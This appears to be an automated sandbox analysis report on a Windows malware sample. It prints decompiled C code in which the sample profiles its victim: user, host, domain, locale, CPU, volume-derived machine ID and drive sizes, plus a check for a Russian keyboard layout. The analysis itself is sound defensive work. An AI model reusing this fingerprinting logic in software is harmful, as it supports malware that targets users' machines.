                                        • Part of subcall function 00404550: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
                                        • Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
                                        • Part of subcall function 00404550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
                                        • Part of subcall function 00404550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B
                                      • ExitProcess.KERNEL32 ref: 004048BC
                                      • CreateThread.KERNEL32 ref: 004048D1
                                      • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 004048E9
                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 004048FC
                                      • CloseHandle.KERNEL32(00000000), ref: 00404906
                                      • ExitProcess.KERNEL32 ref: 0040496E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
                                      • String ID: open
                                      • API String ID: 3160775492-2758837156
                                      • Opcode ID: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
                                      • Instruction ID: 2fe3139fa9bd6d9f2b7618e63861a0a4b2c33c0f11c60c5fb30394d5f0607533
                                      • Opcode Fuzzy Hash: 2adaf577edfec1f8d3a4591ce7ab69e68017f846f83df95990bf0665a8258e38
                                      • Instruction Fuzzy Hash: FD612CB0A40209ABEB14EFA1DD4ABEF7774AB84705F104029F601BA2D1DBB85E45CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 406d90-406da7 1 406da9-406dc8 VirtualAlloc GetUserNameW 0->1 2 406dce-406dd2 0->2 1->2 3 406dd4-406df0 VirtualAlloc GetComputerNameW 2->3 4 406df6-406e00 2->4 3->4 5 406e02-406e17 VirtualAlloc 4->5 6 406e56-406e5a 4->6 5->6 7 406e19-406e2f call 406d10 5->7 8 406e60-406e9a VirtualAlloc RegOpenKeyExW 6->8 9 406ef5-406ef9 6->9 18 406e34-406e36 7->18 13 406e9c-406ebe RegQueryValueExW 8->13 14 406ede-406eef VirtualFree 8->14 10 407024-407028 9->10 11 406eff-406f3b VirtualAlloc * 2 9->11 15 4070d6-4070da 10->15 16 40702e-407068 VirtualAlloc RegOpenKeyExW 10->16 17 406f40-406f73 wsprintfW RegOpenKeyExW 11->17 19 406ec0-406ec7 13->19 20 406ec9 GetLastError 13->20 14->9 27 407134-407138 15->27 28 4070dc-4070fd GetNativeSystemInfo VirtualAlloc 15->28 21 40706a-40708c RegQueryValueExW 16->21 22 4070ac-4070d3 call 406d10 wsprintfW 16->22 23 406fe3-406fe8 17->23 24 406f75-406f95 RegQueryValueExW 17->24 25 406e38-406e3f 18->25 26 406e49-406e4e 18->26 29 406ecf-406edc RegCloseKey 19->29 20->29 30 407097 GetLastError 21->30 31 40708e-407095 21->31 22->15 39 406fed 23->39 32 406fa0 GetLastError 24->32 33 406f97-406f9e 24->33 25->6 36 406e41-406e47 25->36 38 406e51-406e53 wsprintfW 26->38 34 407155-407159 27->34 35 40713a-407150 call 407520 27->35 40 407129 28->40 41 4070ff-407106 28->41 29->9 29->14 43 40709d-4070aa RegCloseKey 30->43 31->43 44 406fa6-406fb3 RegCloseKey 32->44 33->44 46 4072e9 34->46 47 40715f-4071fe VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW RegOpenKeyExW 34->47 35->34 65 407152 35->65 36->38 38->6 49 406ff0-406ff3 39->49 42 40712e-407131 wsprintfW 40->42 41->40 50 407122-407127 41->50 51 407114-407119 41->51 52 40711b-407120 41->52 53 40710d-407112 41->53 42->27 43->15 43->22 44->23 55 406fb5-406fc5 lstrcmpiW 44->55 56 4072ef-4072f3 46->56 57 407200-407223 RegQueryValueExW 47->57 58 40726d-4072a9 wsprintfW lstrcatW GetModuleHandleW GetProcAddress 47->58 59 406ff5-406ff7 49->59 60 406ffd-406fff 49->60 50->42 51->42 52->42 53->42 66 406fc7-406fe1 wsprintfW 55->66 67 406fea 55->67 68 4074a0-4074a7 56->68 69 4072f9-407340 VirtualAlloc 56->69 70 407225-40722c 57->70 71 40722e GetLastError 57->71 63 4072c7 58->63 64 4072ab-4072c5 lstrlenW 58->64 59->17 59->60 61 407001-40700b wsprintfW 60->61 62 40700e-40701e VirtualFree 60->62 61->62 62->10 74 4072ce-4072e7 VirtualFree 63->74 64->74 65->34 66->49 67->39 72 4074a9-4074c5 VirtualAlloc 68->72 73 4074ee-4074f9 68->73 75 407345-407350 69->75 76 407234-407241 RegCloseKey 70->76 71->76 78 4074e4 72->78 79 4074c7-4074d0 call 4068f0 72->79 74->56 75->75 80 407352-407367 75->80 76->58 81 407243-407268 lstrlenW call 406d10 76->81 78->73 79->73 89 4074d2-4074de VirtualFree 79->89 84 407370-407388 GetDriveTypeW 80->84 81->58 86 40747b 84->86 87 40738e-407391 84->87 88 407481-40748b 86->88 87->86 90 407397-4073de lstrcatW * 3 GetDiskFreeSpaceW 87->90 88->84 91 407491-40749b lstrlenW 88->91 89->78 92 407471-407479 lstrcatW 90->92 93 4073e4-40746f call 408470 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 90->93 91->68 92->86 93->88
                                      C-Code - Quality: 90%
                                      			E00406D90(char* __ecx) {
                                      				WCHAR* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				int _v28;
                                      				int _v32;
                                      				short _v36;
                                      				short _v40;
                                      				WCHAR* _v44;
                                      				WCHAR* _v48;
                                      				WCHAR* _v52;
                                      				WCHAR* _v56;
                                      				WCHAR* _v60;
                                      				WCHAR* _v64;
                                      				WCHAR* _v68;
                                      				signed short _v76;
                                      				char _v132;
                                      				void* _t182;
                                      				long _t183;
                                      				short _t186;
                                      				short _t187;
                                      				short _t188;
                                      				signed int _t189;
                                      				signed int _t194;
                                      				void* _t209;
                                      				signed int _t211;
                                      				signed int _t214;
                                      				WCHAR* _t218;
                                      				WCHAR* _t219;
                                      				long _t228;
                                      				_Unknown_base(*)()* _t233;
                                      				long _t242;
                                      				signed int _t245;
                                      				intOrPtr _t250;
                                      				WCHAR* _t252;
                                      				WCHAR* _t254;
                                      				void* _t263;
                                      				WCHAR* _t269;
                                      				void* _t278;
                                      				WCHAR* _t286;
                                      				void* _t287;
                                      				WCHAR* _t289;
                                      				WCHAR* _t290;
                                      				WCHAR* _t292;
                                      				DWORD* _t296;
                                      				char* _t300;
                                      				short* _t301;
                                      				DWORD* _t307;
                                      				signed int _t310;
                                      				void* _t314;
                                      				char* _t316;
                                      				char* _t318;
                                      				void* _t319;
                                      				void* _t320;
                                      
                                      				_t300 = __ecx;
                                      				_t318 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4);
                                      					_t300 =  &_v28;
                                      					 *(_t318 + 8) = _t292;
                                      					_v28 = 0x100;
                                      					GetUserNameW(_t292, _t300);
                                      				}
                                      				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
                                      					_v28 = 0x1e;
                                      					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4);
                                      					_t300 =  &_v28;
                                      					 *(_t318 + 0x14) = _t290;
                                      					GetComputerNameW(_t290, _t300);
                                      				}
                                      				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
                                      					L11:
                                      					if( *(_t318 + 0x30) == 0) {
                                      						L18:
                                      						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
                                      							L35:
                                      							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
                                      								L42:
                                      								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
                                      									L51:
                                      									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
                                      										_v32 = 0;
                                      										_t250 = E00407520(_t318 + 0x2c,  &_v32);
                                      										if(_t250 == 0) {
                                      											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
                                      										}
                                      									}
                                      									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
                                      										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                      										 *(_t318 + 0x68) = _t218;
                                      										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                      										_v16 = _t219;
                                      										_t81 =  &(_t219[0x306]); // 0x60c
                                      										_v8 = _t81;
                                      										GetWindowsDirectoryW(_t219, 0x100);
                                      										_t300 = _v16;
                                      										_t300[6] = 0;
                                      										_t85 =  &(_t300[0x600]); // 0x600
                                      										_t307 = _t85;
                                      										_t86 =  &(_t300[0x400]); // 0x400
                                      										_v20 = _t307;
                                      										_t88 =  &(_t300[0x604]); // 0x604
                                      										_t89 =  &(_t300[0x608]); // 0x608
                                      										_t90 =  &(_t300[0x200]); // 0x200
                                      										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
                                      										_v24 = 0;
                                      										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
                                      										if(_t228 == 0) {
                                      											_t300 = _v8;
                                      											_v32 = 0x80;
                                      											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
                                      											if(_t242 != 0) {
                                      												GetLastError();
                                      											} else {
                                      												_v24 = 1;
                                      											}
                                      											RegCloseKey(_v28);
                                      											if(_v24 != 0) {
                                      												_t245 = lstrlenW(_v8);
                                      												_t300 = _v8;
                                      												_push(_t300);
                                      												E00406D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
                                      											}
                                      										}
                                      										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
                                      										_t320 = _t320 + 0xc;
                                      										lstrcatW( *(_t318 + 0x68), _v8);
                                      										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                      										_v32 = _t233;
                                      										if(_t233 == 0) {
                                      											 *(_t318 + 0x6c) = 0;
                                      										} else {
                                      											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
                                      										}
                                      										 *(_t318 + 0x70) =  *_v20;
                                      										VirtualFree(_v16, 0, 0x8000); // executed
                                      									}
                                      									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
                                      										L78:
                                      										if( *(_t318 + 0x80) == 0) {
                                      											L83:
                                      											return 1;
                                      										}
                                      										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4);
                                      										 *(_t318 + 0x84) = _t182;
                                      										if(_t182 == 0) {
                                      											L82:
                                      											 *(_t318 + 0x80) = 0;
                                      											goto L83;
                                      										}
                                      										_push(_t300);
                                      										_t183 = E004068F0(_t182);
                                      										if(_t183 != 0) {
                                      											goto L83;
                                      										}
                                      										VirtualFree( *(_t318 + 0x84), _t183, 0x8000);
                                      										goto L82;
                                      									} else {
                                      										_v68 = L"UNKNOWN";
                                      										_v64 = L"NO_ROOT_DIR";
                                      										_v60 = L"REMOVABLE";
                                      										_v56 = L"FIXED";
                                      										_v52 = L"REMOTE";
                                      										_v48 = L"CDROM";
                                      										_v44 = L"RAMDISK";
                                      										 *(_t318 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      										_t301 =  &_v132;
                                      										_t186 = 0x41;
                                      										do {
                                      											 *_t301 = _t186;
                                      											_t301 = _t301 + 2;
                                      											_t186 = _t186 + 1;
                                      										} while (_t186 <= 0x5a);
                                      										_t187 =  *L"?:\\"; // 0x3a003f
                                      										_v40 = _t187;
                                      										_t188 =  *0x40e308; // 0x5c
                                      										_v36 = _t188;
                                      										_t189 = 0;
                                      										_v28 = 0;
                                      										do {
                                      											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
                                      											_t310 = GetDriveTypeW( &_v40);
                                      											if(_t310 > 2 && _t310 != 5) {
                                      												_v36 = 0;
                                      												lstrcatW( *(_t318 + 0x7c),  &_v40);
                                      												_v36 = 0x5c;
                                      												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
                                      												lstrcatW( *(_t318 + 0x7c), "_");
                                      												if(GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20) == 0) {
                                      													lstrcatW( *(_t318 + 0x7c), L"0,");
                                      													goto L75;
                                      												}
                                      												_v12 = E00408470(_v20, 0, _v32 * _v24, 0);
                                      												_t296 = _t307;
                                      												_t209 = E00408470(_v16, 0, _v32 * _v24, 0);
                                      												_t314 = _v12;
                                      												_v8 = _t314 - _t209;
                                      												asm("sbb eax, edx");
                                      												_v12 = _t296;
                                      												_t211 = lstrlenW( *(_t318 + 0x7c));
                                      												_push(_t296);
                                      												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
                                      												_t214 = lstrlenW( *(_t318 + 0x7c));
                                      												_push(_v12);
                                      												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
                                      												_t320 = _t320 + 0x20;
                                      												lstrcatW( *(_t318 + 0x7c), ",");
                                      											}
                                      											_t189 =  &(1[_v28]);
                                      											_v28 = _t189;
                                      										} while (_t189 < 0x1b);
                                      										_t194 = lstrlenW( *(_t318 + 0x7c));
                                      										_t300 =  *(_t318 + 0x7c);
                                      										_t300[_t194 * 2 - 2] = 0;
                                      										goto L78;
                                      									}
                                      								}
                                      								__imp__GetNativeSystemInfo( &_v76);
                                      								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4);
                                      								_t300 = _v76 & 0x0000ffff;
                                      								 *(_t318 + 0x5c) = _t252;
                                      								if(_t300 > 9) {
                                      									L49:
                                      									_push(L"Unknown");
                                      									L50:
                                      									wsprintfW(_t252, ??);
                                      									_t320 = _t320 + 8;
                                      									goto L51;
                                      								}
                                      								_t300 = _t300[E00407510] & 0x000000ff;
                                      								switch( *((intOrPtr*)(_t300 * 4 +  &M004074FC))) {
                                      									case 0:
                                      										_push(L"x86");
                                      										goto L50;
                                      									case 1:
                                      										_push(L"ARM");
                                      										goto L50;
                                      									case 2:
                                      										_push(L"Itanium");
                                      										goto L50;
                                      									case 3:
                                      										_push(L"x64");
                                      										goto L50;
                                      									case 4:
                                      										goto L49;
                                      								}
                                      							}
                                      							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4);
                                      							_v20 = _t254;
                                      							 *(_t318 + 0x50) = _t254;
                                      							_v24 = 0;
                                      							if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28) != 0) {
                                      								L41:
                                      								_push(_t300);
                                      								E00406D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
                                      								wsprintfW( *(_t318 + 0x50), L"error");
                                      								_t320 = _t320 + 8;
                                      								goto L42;
                                      							}
                                      							_v32 = 0x80;
                                      							if(RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32) != 0) {
                                      								GetLastError();
                                      							} else {
                                      								_v24 = 1;
                                      							}
                                      							RegCloseKey(_v28);
                                      							if(_v24 != 0) {
                                      								goto L42;
                                      							} else {
                                      								goto L41;
                                      							}
                                      						}
                                      						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4);
                                      						_v16 = _t263;
                                      						_v28 = _t263 + 0xe;
                                      						 *(_t318 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
                                      						_t316 = 1;
                                      						_v8 = 1;
                                      						_v12 = 0;
                                      						do {
                                      							wsprintfW(_v16, L"%d", _t316);
                                      							_t320 = _t320 + 0xc;
                                      							_v24 = 0;
                                      							_t316 =  &(_t316[1]);
                                      							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20) != 0) {
                                      								L27:
                                      								_t269 = 0;
                                      								_v8 = 0;
                                      								L29:
                                      								_t300 = _v12;
                                      								goto L30;
                                      							}
                                      							_v32 = 0x80;
                                      							if(RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32) != 0) {
                                      								GetLastError();
                                      							} else {
                                      								_v24 = 1;
                                      							}
                                      							RegCloseKey(_v20);
                                      							if(_v24 == 0) {
                                      								goto L27;
                                      							} else {
                                      								if(lstrcmpiW(_v28, L"00000419") != 0) {
                                      									_t269 = _v8;
                                      									goto L29;
                                      								}
                                      								wsprintfW( *(_t318 + 0x44), "1");
                                      								_t320 = _t320 + 8;
                                      								_t300 = 1;
                                      								_t269 = 0;
                                      								_v12 = 1;
                                      								_v8 = 0;
                                      							}
                                      							L30:
                                      						} while (_t316 != 9 && _t269 != 0);
                                      						if(_t300 == 0) {
                                      							wsprintfW( *(_t318 + 0x44), "0");
                                      							_t320 = _t320 + 8;
                                      						}
                                      						VirtualFree(_v16, 0, 0x8000);
                                      						goto L35;
                                      					}
                                      					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4);
                                      					_v24 = _t278;
                                      					 *(_t318 + 0x38) = _t278;
                                      					_v12 = 0;
                                      					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16) != 0) {
                                      						L17:
                                      						 *(_t318 + 0x30) = 0;
                                      						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
                                      						goto L18;
                                      					}
                                      					_v28 = 0x40;
                                      					if(RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28) != 0) {
                                      						GetLastError();
                                      					} else {
                                      						_v12 = 1;
                                      					}
                                      					RegCloseKey(_v16);
                                      					if(_v12 != 0) {
                                      						goto L18;
                                      					} else {
                                      						goto L17;
                                      					}
                                      				} else {
                                      					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                      					 *(_t318 + 0x20) = _t286;
                                      					if(_t286 == 0) {
                                      						goto L11;
                                      					}
                                      					_push(_t300);
                                      					_t287 = E00406D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
                                      					if(_t287 == 0) {
                                      						wsprintfW( *(_t318 + 0x20), L"undefined");
                                      						L10:
                                      						_t320 = _t320 + 8;
                                      						goto L11;
                                      					}
                                      					_t289 =  *(_t318 + 0x20);
                                      					if( *_t289 != 0) {
                                      						goto L11;
                                      					}
                                      					wsprintfW(_t289, L"WORKGROUP");
                                      					goto L10;
                                      				}
                                      			}


























































                                      0x00406d90
                                      0x00406d9b
                                      0x00406da7
                                      0x00406db7
                                      0x00406db9
                                      0x00406dbc
                                      0x00406dc1
                                      0x00406dc8
                                      0x00406dc8
                                      0x00406dd2
                                      0x00406ddf
                                      0x00406de6
                                      0x00406de8
                                      0x00406deb
                                      0x00406df0
                                      0x00406df0
                                      0x00406e00
                                      0x00406e56
                                      0x00406e5a
                                      0x00406ef5
                                      0x00406ef9
                                      0x00407024
                                      0x00407028
                                      0x004070d6
                                      0x004070da
                                      0x00407134
                                      0x00407138
                                      0x0040713d
                                      0x00407149
                                      0x00407150
                                      0x00407152
                                      0x00407152
                                      0x00407150
                                      0x00407159
                                      0x0040716d
                                      0x0040717d
                                      0x00407180
                                      0x00407188
                                      0x0040718b
                                      0x00407191
                                      0x00407194
                                      0x0040719a
                                      0x004071a4
                                      0x004071a8
                                      0x004071a8
                                      0x004071ae
                                      0x004071b4
                                      0x004071b8
                                      0x004071bf
                                      0x004071cc
                                      0x004071d4
                                      0x004071dd
                                      0x004071f6
                                      0x004071fe
                                      0x00407200
                                      0x00407214
                                      0x0040721b
                                      0x00407223
                                      0x0040722e
                                      0x00407225
                                      0x00407225
                                      0x00407225
                                      0x00407237
                                      0x00407241
                                      0x00407246
                                      0x0040724c
                                      0x0040724f
                                      0x00407268
                                      0x00407268
                                      0x00407241
                                      0x0040727a
                                      0x00407282
                                      0x0040728b
                                      0x0040729e
                                      0x004072a4
                                      0x004072a9
                                      0x004072c7
                                      0x004072ab
                                      0x004072c2
                                      0x004072c2
                                      0x004072da
                                      0x004072e1
                                      0x004072e1
                                      0x004072f3
                                      0x004074a0
                                      0x004074a7
                                      0x004074f0
                                      0x004074f9
                                      0x004074f9
                                      0x004074b7
                                      0x004074bd
                                      0x004074c5
                                      0x004074e4
                                      0x004074e4
                                      0x00000000
                                      0x004074e4
                                      0x004074c7
                                      0x004074c9
                                      0x004074d0
                                      0x00000000
                                      0x00000000
                                      0x004074de
                                      0x00000000
                                      0x004072f9
                                      0x00407307
                                      0x0040730e
                                      0x00407315
                                      0x0040731c
                                      0x00407323
                                      0x0040732a
                                      0x00407331
                                      0x0040733a
                                      0x0040733d
                                      0x00407340
                                      0x00407345
                                      0x00407345
                                      0x00407348
                                      0x0040734b
                                      0x0040734c
                                      0x00407352
                                      0x00407357
                                      0x0040735a
                                      0x0040735f
                                      0x00407362
                                      0x00407364
                                      0x00407370
                                      0x00407375
                                      0x00407383
                                      0x00407388
                                      0x00407399
                                      0x004073a4
                                      0x004073b2
                                      0x004073b6
                                      0x004073c0
                                      0x004073de
                                      0x00407479
                                      0x00000000
                                      0x00407479
                                      0x00407400
                                      0x00407403
                                      0x00407405
                                      0x0040740a
                                      0x00407416
                                      0x00407419
                                      0x0040741b
                                      0x0040741e
                                      0x00407427
                                      0x00407438
                                      0x00407446
                                      0x00407448
                                      0x0040745a
                                      0x00407462
                                      0x0040746d
                                      0x0040746d
                                      0x00407484
                                      0x00407485
                                      0x00407488
                                      0x00407494
                                      0x00407496
                                      0x0040749b
                                      0x00000000
                                      0x0040749b
                                      0x004072f3
                                      0x004070e0
                                      0x004070f1
                                      0x004070f3
                                      0x004070f7
                                      0x004070fd
                                      0x00407129
                                      0x00407129
                                      0x0040712e
                                      0x0040712f
                                      0x00407131
                                      0x00000000
                                      0x00407131
                                      0x004070ff
                                      0x00407106
                                      0x00000000
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407114
                                      0x00000000
                                      0x00000000
                                      0x0040711b
                                      0x00000000
                                      0x00000000
                                      0x0040710d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407106
                                      0x0040703c
                                      0x0040703e
                                      0x00407041
                                      0x00407059
                                      0x00407068
                                      0x004070ac
                                      0x004070ac
                                      0x004070c4
                                      0x004070d1
                                      0x004070d3
                                      0x00000000
                                      0x004070d3
                                      0x0040706d
                                      0x0040708c
                                      0x00407097
                                      0x0040708e
                                      0x0040708e
                                      0x0040708e
                                      0x004070a0
                                      0x004070aa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004070aa
                                      0x00406f0d
                                      0x00406f16
                                      0x00406f20
                                      0x00406f25
                                      0x00406f28
                                      0x00406f2d
                                      0x00406f34
                                      0x00406f40
                                      0x00406f49
                                      0x00406f4b
                                      0x00406f4e
                                      0x00406f58
                                      0x00406f73
                                      0x00406fe3
                                      0x00406fe3
                                      0x00406fe5
                                      0x00406fed
                                      0x00406fed
                                      0x00000000
                                      0x00406fed
                                      0x00406f78
                                      0x00406f95
                                      0x00406fa0
                                      0x00406f97
                                      0x00406f97
                                      0x00406f97
                                      0x00406fa9
                                      0x00406fb3
                                      0x00000000
                                      0x00406fb5
                                      0x00406fc5
                                      0x00406fea
                                      0x00000000
                                      0x00406fea
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd4
                                      0x00406fd9
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fde
                                      0x00406ff0
                                      0x00406ff0
                                      0x00406fff
                                      0x00407009
                                      0x0040700b
                                      0x0040700b
                                      0x00407018
                                      0x00000000
                                      0x0040701e
                                      0x00406e6e
                                      0x00406e70
                                      0x00406e73
                                      0x00406e8b
                                      0x00406e9a
                                      0x00406ede
                                      0x00406ee8
                                      0x00406eef
                                      0x00000000
                                      0x00406eef
                                      0x00406e9f
                                      0x00406ebe
                                      0x00406ec9
                                      0x00406ec0
                                      0x00406ec0
                                      0x00406ec0
                                      0x00406ed2
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406e02
                                      0x00406e10
                                      0x00406e12
                                      0x00406e17
                                      0x00000000
                                      0x00000000
                                      0x00406e19
                                      0x00406e2f
                                      0x00406e36
                                      0x00406e51
                                      0x00406e51
                                      0x00406e53
                                      0x00000000
                                      0x00406e53
                                      0x00406e38
                                      0x00406e3f
                                      0x00000000
                                      0x00000000
                                      0x00406e51
                                      0x00000000
                                      0x00406e51

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
                                      • GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
                                      • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
                                      • GetComputerNameW.KERNEL32 ref: 00406DF0
                                      • VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
                                      • wsprintfW.USER32 ref: 00406E51
                                      • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
                                      • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
                                      • RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
                                      • GetLastError.KERNEL32 ref: 00406EC9
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
                                      • VirtualFree.KERNEL32(004048B6,00000000,00008000), ref: 00406EEF
                                      • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00406F0D
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00406F23
                                      • wsprintfW.USER32 ref: 00406F49
                                      • RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,00404590), ref: 00406F6B
                                      • RegQueryValueExW.ADVAPI32(00404590,00000000,00000000,00000000,?,?), ref: 00406F8D
                                      • GetLastError.KERNEL32 ref: 00406FA0
                                      • RegCloseKey.ADVAPI32(00404590), ref: 00406FA9
                                      • lstrcmpiW.KERNEL32(?,00000419), ref: 00406FBD
                                      • wsprintfW.USER32 ref: 00406FCF
                                      • wsprintfW.USER32 ref: 00407009
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407018
                                      • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0040703C
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00407060
                                      • RegQueryValueExW.ADVAPI32(?,productName,00000000,00000000,00404590,?), ref: 00407084
                                      • GetLastError.KERNEL32 ref: 00407097
                                      • RegCloseKey.ADVAPI32(?), ref: 004070A0
                                      • wsprintfW.USER32 ref: 004070D1
                                      • GetNativeSystemInfo.KERNEL32(?), ref: 004070E0
                                      • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 004070F1
                                      • wsprintfW.USER32 ref: 0040712F
                                      • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0040716D
                                      • VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 00407180
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00407194
                                      • GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 004071D4
                                      • RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 004071F6
                                      • RegQueryValueExW.KERNELBASE(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 0040721B
                                      • GetLastError.KERNEL32 ref: 0040722E
                                      • RegCloseKey.ADVAPI32(?), ref: 00407237
                                      • lstrlenW.KERNEL32(00000000), ref: 00407246
                                        • Part of subcall function 00406D10: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
                                        • Part of subcall function 00406D10: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
                                        • Part of subcall function 00406D10: RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
                                      • wsprintfW.USER32 ref: 0040727A
                                      • lstrcatW.KERNEL32(?,00000000), ref: 0040728B
